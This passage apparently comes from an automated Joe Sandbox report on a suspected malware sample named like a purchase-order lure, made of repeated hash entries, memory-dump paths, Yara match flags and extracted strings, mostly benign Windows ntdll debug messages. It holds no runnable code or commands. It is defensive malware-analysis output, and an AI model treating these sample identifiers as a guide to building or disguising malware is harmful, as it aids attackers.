                            • Opcode ID: 605cedad5325065dd3913b3fb6591408f3854d776ef77fbe9a15ffaacfafa0fb
                            • Instruction ID: 4976eeabfe7060fb218f36c8bc40ecf8f819bbd4cfd84be621f7fa9d23213d9a
                            • Opcode Fuzzy Hash: 605cedad5325065dd3913b3fb6591408f3854d776ef77fbe9a15ffaacfafa0fb
                            • Instruction Fuzzy Hash: 2A90023120140842D10075584844B47500A97E0301F95C116A4124758EC615C9517621
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: feeaad9da6aa3739ccdd63d74fd96339da8ffacab8f4f72c933bd8e4731ccb5c
                            • Instruction ID: 7ade7bf885483c8db6e385f7e0490137b56dd1cf9ad6f3861e5286792284250c
                            • Opcode Fuzzy Hash: feeaad9da6aa3739ccdd63d74fd96339da8ffacab8f4f72c933bd8e4731ccb5c
                            • Instruction Fuzzy Hash: 9B90023120140403D10075585948707500A97D0301F95D511A442465CED65689516221
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 779b224ac11d2acfa84c8a378135a7604fc44e90b68df1fd0d8440c13e52ab23
                            • Instruction ID: 94f74a7d80a6c39f218a66f43ef4383e4a98c8a4348284b1231df5b0a5f03cca
                            • Opcode Fuzzy Hash: 779b224ac11d2acfa84c8a378135a7604fc44e90b68df1fd0d8440c13e52ab23
                            • Instruction Fuzzy Hash: 9C90022160540402D14075585858707501A97D0301F95D111A4024658EC6598B5567A1
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ac4c6fc04efdbebf36d3de967e8b27fbb94fd81c45ff327762ebf05d40a876c2
                            • Instruction ID: feb4dec94f0a4e8fda6e16ca4e2b44ae48874cea2c86d67117f4133a35ed8c32
                            • Opcode Fuzzy Hash: ac4c6fc04efdbebf36d3de967e8b27fbb94fd81c45ff327762ebf05d40a876c2
                            • Instruction Fuzzy Hash: 5290023120140402D10079985848647500A97E0301F95D111A9024659FC66589916231
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 306ae65888ccef4e7ca2ba61152ec186fa752055e44c1f97ee5f8e9a6f1ac6db
                            • Instruction ID: 9ad92e3a5fcd329a49c892554f7546f610592e1226a187da2a6872e97bfb1f0e
                            • Opcode Fuzzy Hash: 306ae65888ccef4e7ca2ba61152ec186fa752055e44c1f97ee5f8e9a6f1ac6db
                            • Instruction Fuzzy Hash: 6C90026121140042D10475584844707504A97E1301F95C112A6154658DC5298D615225
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3518ab50fd3eb5a397da0b3433ff92ade2599e008087cc7fd33816be304f93b5
                            • Instruction ID: 794eb2d7d61ab29a8674d13de0d1a5fba605c57125a5e0c8ae983941f66de653
                            • Opcode Fuzzy Hash: 3518ab50fd3eb5a397da0b3433ff92ade2599e008087cc7fd33816be304f93b5
                            • Instruction Fuzzy Hash: A690026134140442D10075584854B07500AD7E1301F95C115E5064658EC619CD526226
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9916ea5551c030550c6f9af88c4d100cefc80ea303958a3d668eb8514263db4c
                            • Instruction ID: 26435fd92e0ecfe178f1e0953010a5710ba33ad46ccbba231a16d06f188af2fb
                            • Opcode Fuzzy Hash: 9916ea5551c030550c6f9af88c4d100cefc80ea303958a3d668eb8514263db4c
                            • Instruction Fuzzy Hash: E9900221211C0042D20079684C54B07500A97D0303F95C215A4154658DC91589615621
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 46c5de03337e6055d575fef467deb0804e06c8e86e24ef2baa08cd54ab733ae8
                            • Instruction ID: a15d857a449dec93b169e87e33d3a88ba780cacc5cee16f6d3ed8e1f80ff6ee4
                            • Opcode Fuzzy Hash: 46c5de03337e6055d575fef467deb0804e06c8e86e24ef2baa08cd54ab733ae8
                            • Instruction Fuzzy Hash: F590023120180402D10075584C48747500A97D0302F95C111A9164659FC665C9916631
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: df66f2603d0aa4bb0a55f43109269cbf0e8de03202dc4aa67cf4eea0b517c6c2
                            • Instruction ID: d17426581bb266eb979556f6adc7c9b10b3d17d3d0ea7482f65f957a8fd2e7ce
                            • Opcode Fuzzy Hash: df66f2603d0aa4bb0a55f43109269cbf0e8de03202dc4aa67cf4eea0b517c6c2
                            • Instruction Fuzzy Hash: 9C90022160140042414075688C84907900ABBE1311795C221A4998654EC55989655765
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3f5102003ba1f550a54cf3a70da2d6d3ad12a5f0da67ecd48c87ae0d423a406
                            • Instruction ID: b98da38bf73af73f7ca65e11356b5bfd241db848c4a81a565655cc8106e7c857
                            • Opcode Fuzzy Hash: b3f5102003ba1f550a54cf3a70da2d6d3ad12a5f0da67ecd48c87ae0d423a406
                            • Instruction Fuzzy Hash: 3C90023120180402D10075584C5470B500A97D0302F95C111A5164659EC62589516671
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7acfad9f12deea8cd52dc86431db70b4a5e6beaeab3d753d47883882df3d6909
                            • Instruction ID: 0cc81ea747d704926870f6aa2b6fa684ad6a3498c85821d87f13997fbacad429
                            • Opcode Fuzzy Hash: 7acfad9f12deea8cd52dc86431db70b4a5e6beaeab3d753d47883882df3d6909
                            • Instruction Fuzzy Hash: 3290022130140402D10275584854607500ED7D1345FD5C112E5424659EC6258A53A232
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 164bba439073ea83d6b5ae97bd788db659c38147de06f722e68ff90fd1003a62
                            • Instruction ID: a1ca5e7726922f7c8cb59ba5828ef155108cfdd5e3557dfb49302408323fa529
                            • Opcode Fuzzy Hash: 164bba439073ea83d6b5ae97bd788db659c38147de06f722e68ff90fd1003a62
                            • Instruction Fuzzy Hash: 4D90026120180403D14079584C44607500A97D0302F95C111A6064659FCA298D516235
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dc37cc5f09d3d9f1b62aee7bfb22a4c11bf1e4b523e17d6b4c3eb00a2fd3227d
                            • Instruction ID: 5c545f90bfe0544ca5874df924cd4be6ec43199e3b76d7cd190dbc5631e99002
                            • Opcode Fuzzy Hash: dc37cc5f09d3d9f1b62aee7bfb22a4c11bf1e4b523e17d6b4c3eb00a2fd3227d
                            • Instruction Fuzzy Hash: 9090027120140402D14075584844747500A97D0301F95C111A9064658FC6598ED56765
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5c15e86026e38fcb7dfd56b2fce7a50218eb60b984ebd3e5adfe9d6b3c8a25c
                            • Instruction ID: ee0976ee4e2b07ef5b86119e9d04459843d92bd51d837e4067112b5fb911c9e4
                            • Opcode Fuzzy Hash: f5c15e86026e38fcb7dfd56b2fce7a50218eb60b984ebd3e5adfe9d6b3c8a25c
                            • Instruction Fuzzy Hash: D090022160140502D10175584844617500F97D0341FD5C122A5024659FCA258A92A231
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ee744c5f2af85ee4f122880138a997cbcb0c60b725141a5e3a883cdd2296ee6d
                            • Instruction ID: 07ba15777218980f87767f12e23372568e65ad9c69a89e777e500d98beeba691
                            • Opcode Fuzzy Hash: ee744c5f2af85ee4f122880138a997cbcb0c60b725141a5e3a883cdd2296ee6d
                            • Instruction Fuzzy Hash: FA90022120184442D14076584C44B0F910A97E1302FD5C119A8156658DC91589555721
                            Memory Dump Source
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: c40539e092813e65167b4777f34f7fcbe6f0a0657a55a0b2c9cf779889b1fc0f
                            • Instruction ID: 1d096a4c89a9d4909213187ff3ae3122c4fbd87f756b43db9fd17eaebb01560a
                            • Opcode Fuzzy Hash: c40539e092813e65167b4777f34f7fcbe6f0a0657a55a0b2c9cf779889b1fc0f
                            • Instruction Fuzzy Hash: A251D5B6A00116AFDB11DF9D8CA097EFBB8BB08240B54826EE4A5D7741D334DE45CBA4
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: 3d5469099336fe431a67f996e9fd7c7202728a030f62232e9864182dc9c0545f
                            • Instruction ID: dea8c3f6ba1557017e3f6985aa5e390e95d6b02686b50bf361817b270577f4fd
                            • Opcode Fuzzy Hash: 3d5469099336fe431a67f996e9fd7c7202728a030f62232e9864182dc9c0545f
                            • Instruction Fuzzy Hash: 2051F671A01655AECB30DF5CCDA497FBBFEEB48200B048A5DE596C7741E7B4EA408B60
                            Strings
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 016A4655
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016A46FC
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 016A4725
                            • ExecuteOptions, xrefs: 016A46A0
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 016A4787
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 016A4742
                            • Execute=1, xrefs: 016A4713
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            • Opcode ID: 4a0417b8f1a7fa76e1cca5fbcb6f2bede953ab4ebbff2832b131d2800855011e
                            • Instruction ID: 0cbecb896c0121040c59d9b24075cc206b698afd84c68e885751940889092baf
                            • Opcode Fuzzy Hash: 4a0417b8f1a7fa76e1cca5fbcb6f2bede953ab4ebbff2832b131d2800855011e
                            • Instruction Fuzzy Hash: B2513A316002197AEF21ABA9DC85FBE7BADEF15308F4800ADD605E7291EB719E418F54
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction ID: 594b93f204c5c02190634ab92ec5094c060f326ed68416cd4f9b0d894cf1b2af
                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction Fuzzy Hash: 4D81BE70E052599EEF29CE6CCC917FEBBB2AF45320F1C421AE961A7391C7349841CB65
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$[$]:%u
                            • API String ID: 48624451-2819853543
                            • Opcode ID: dd67b1a474283c110acb87eed11169fbb80be38e8a5a3d8b84ba28ac01f2ef2a
                            • Instruction ID: 3f07eb93475db4ff27151fb356d21707dcfe0971d89e3efba7efb0272cc4e702
                            • Opcode Fuzzy Hash: dd67b1a474283c110acb87eed11169fbb80be38e8a5a3d8b84ba28ac01f2ef2a
                            • Instruction Fuzzy Hash: A621657AA01119ABDB10DF79CC54AFE7BFEEF54651F04021EEA05E3200E730DA158BA1
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016A02BD
                            • RTL: Re-Waiting, xrefs: 016A031E
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016A02E7
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            • Opcode ID: c7f9ca1844579dd2cbda40f3d5196bf9894a7200562966874bcc9677d23ab7b3
                            • Instruction ID: ba68afeb5ec485a74deb970ec9fea65cadf0f9c4029dff9bec52f6c991b99ec8
                            • Opcode Fuzzy Hash: c7f9ca1844579dd2cbda40f3d5196bf9894a7200562966874bcc9677d23ab7b3
                            • Instruction Fuzzy Hash: DCE1CE306047429FD765CF28CC84B2ABBE1BB88314F144AADF9A58B3E1D774E945CB52
                            Strings
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 016A7B7F
                            • RTL: Re-Waiting, xrefs: 016A7BAC
                            • RTL: Resource at %p, xrefs: 016A7B8E
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            • Opcode ID: cd0b199f4c5a9c528bc22aec3397cffab2342101fe211ed93ff915b78e0b3d01
                            • Instruction ID: 94e9ea171d3a4ea76b36c75e869ea9becc47574ddf8bd923f7f96c9b6add0603
                            • Opcode Fuzzy Hash: cd0b199f4c5a9c528bc22aec3397cffab2342101fe211ed93ff915b78e0b3d01
                            • Instruction Fuzzy Hash: 3A41E2313007029FD725DE2DCC40B6AB7EAEF98710F100A2DE956DB790DB72E8058B95
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016A728C
                            Strings
                            • RTL: Re-Waiting, xrefs: 016A72C1
                            • RTL: Resource at %p, xrefs: 016A72A3
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 016A7294
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            • Opcode ID: 20302db1ae188887666e34499ad91442adc66f4fd57e03c72a3bbbb839b9073e
                            • Instruction ID: 2f47845f2ac00a4568eaffd5558c7033581878f9ee6f6a29a1e78e63af276c61
                            • Opcode Fuzzy Hash: 20302db1ae188887666e34499ad91442adc66f4fd57e03c72a3bbbb839b9073e
                            • Instruction Fuzzy Hash: 9041D031701606ABD721DE29CC41B6ABBAAFF94710F14862DF955EB340DB31F8428BD5
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$]:%u
                            • API String ID: 48624451-3050659472
                            • Opcode ID: 33dbbcc057d57bbd7ee664438bb9fe1b8fe9f3439de2a3edcdd4c3f3ae6e2cf1
                            • Instruction ID: 31d613d151064c6c1ddab185c97a20c1c534cc4a1bfe41b9a60699aa5222d805
                            • Opcode Fuzzy Hash: 33dbbcc057d57bbd7ee664438bb9fe1b8fe9f3439de2a3edcdd4c3f3ae6e2cf1
                            • Instruction Fuzzy Hash: D1318272A016199FDB20DE2DCC54BEEB7FDEB44610F44465EE949E3200EB30AA458FA0
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction ID: b2d3fa54562718df6e3e32fd6bc97652ec0aa61de9dd2fee2a18445b739e0491
                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction Fuzzy Hash: C491A171E0020A9BEB24DF6DCD88ABEBBA5EF44320F14461AE955E73C0D7349D41CB61
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            • Opcode ID: be027be2393cb73082fd8f48858574517e1e2a5b520c3b88f1ae69ca877edc40
                            • Instruction ID: 84235301f3689de33a8ac26e5df1fca43417daee62713d3fef6f8ac8ace3681f
                            • Opcode Fuzzy Hash: be027be2393cb73082fd8f48858574517e1e2a5b520c3b88f1ae69ca877edc40
                            • Instruction Fuzzy Hash: C1811B76D002699BDB31CF54CC54BEAB7B8AF48714F0441DAEA19B7280D7709E85CFA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Mh$*r$,$3e$A$A$A4$B?$D$F$Mh3e$O$O$SR$X8$Y$d~$f$g&$h%$m$rp$t
                            • API String ID: 0-3582917983
                            • Opcode ID: ef6a184c884f00fad5f14e57b47cce722697d120d7b28afd4f2dd62e836c01e4
                            • Instruction ID: 4b27be6bcaba1450f7ac42df24339f1f949a0eaea67a8ee5216accc69d8ef349
                            • Opcode Fuzzy Hash: ef6a184c884f00fad5f14e57b47cce722697d120d7b28afd4f2dd62e836c01e4
                            • Instruction Fuzzy Hash: 6932C0B0D05228CFEF25CF85C894BDDBBB2BB46308F1481DAC149AB280D7B55A89CF55
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 6$O$S$\$s
                            • API String ID: 0-3854637164
                            • Opcode ID: 618de5acc1a4419a344b764fe64491fc93f324c16efb8aba1496f63e729fbae7
                            • Instruction ID: 4dbcc22d729c5310485bf84b4c9d30f902cbfb89ae0f284cf47bbf0988e2a416
                            • Opcode Fuzzy Hash: 618de5acc1a4419a344b764fe64491fc93f324c16efb8aba1496f63e729fbae7
                            • Instruction Fuzzy Hash: E541C7B2900619BADB24EFD8DC45FEAB3BCEF44310F0445D5E909DB201E771AA148BE1
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :V$<J
                            • API String ID: 0-426457097
                            • Opcode ID: 4e71d56e765f910013f67112b4c2c3ace6f36cf94c2169b2628089177e84139f
                            • Instruction ID: 24a465c399b2c717859e1437af34e6884fd1f1c2ab2611cefa0a754a8f93eba9
                            • Opcode Fuzzy Hash: 4e71d56e765f910013f67112b4c2c3ace6f36cf94c2169b2628089177e84139f
                            • Instruction Fuzzy Hash: E911ECB6D01219AF8B00DFE9DC409EEBBF9EF48210F0445AAE919E7200E7705A048FA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2t$@N
                            • API String ID: 0-258624828
                            • Opcode ID: f94c1a4934a72b27f66e72f2ecac1ab3285609680565a46bda4080b7762798b8
                            • Instruction ID: 5881e5dfa7c731db294813c13c59d727651e33646880aa2767eb6375879d22da
                            • Opcode Fuzzy Hash: f94c1a4934a72b27f66e72f2ecac1ab3285609680565a46bda4080b7762798b8
                            • Instruction Fuzzy Hash: AA019EB6C01219AE9B44EFE8D9419EEBBF9BB08200F14456AD919F6200E7745654CBA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: N}
                            • API String ID: 0-26705397
                            • Opcode ID: c635c8b0062e8f94e6e2f81e8dec5f310917d09610803b77acf89a12a32f92f1
                            • Instruction ID: e4c1de2981c4a288b52ed3abd6bc7104c3066946f711108b61f1cb05ba59e988
                            • Opcode Fuzzy Hash: c635c8b0062e8f94e6e2f81e8dec5f310917d09610803b77acf89a12a32f92f1
                            • Instruction Fuzzy Hash: 4411EFB6D11219AF9B00DFE9DD409EEB7F9EF48210F1446AAE919E7204E7705A048BA1
                            • Opcode Fuzzy Hash: 249a8113b7f7400b2c7b5638429fc5dfac357ca41f81fbe948e7d3de540197f6
                            • Instruction Fuzzy Hash: 6011E6B6D11219AF9B40DFEDD9409EEFBF9EF48210F14456AE919F7200E7705A048BA1
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 53effe3b5adb85b4f7366131b63994b7c11d229ffdf60afcb3cbe1f90256dc75
                            • Instruction ID: 7ecc8830bc0d68f9109f3f9e6e473f05b8600ce5109a419494437576cb4b8847
                            • Opcode Fuzzy Hash: 53effe3b5adb85b4f7366131b63994b7c11d229ffdf60afcb3cbe1f90256dc75
                            • Instruction Fuzzy Hash: F61118B0C11229AFCB54DFAD88801DDBFF8FF09A20B10855BE858E7211D37186018FD0
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 043c08d0a8dd2b1e71f0431f4605235f5855b0922071984581f1b3c8e30ec818
                            • Instruction ID: 8e1e2cd670883ee3f35e7c0b5a6b2f4607bb16c14915d4b0600a32d22aab011c
                            • Opcode Fuzzy Hash: 043c08d0a8dd2b1e71f0431f4605235f5855b0922071984581f1b3c8e30ec818
                            • Instruction Fuzzy Hash: 4501C4B6201609BFCB44DF89DC81EEB77ADEF8C710F108108FA09E7240D630E8518BA4
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 457267f689ae709420576e3c2ed7ea0155783dab4b3f625014d16e180db9c955
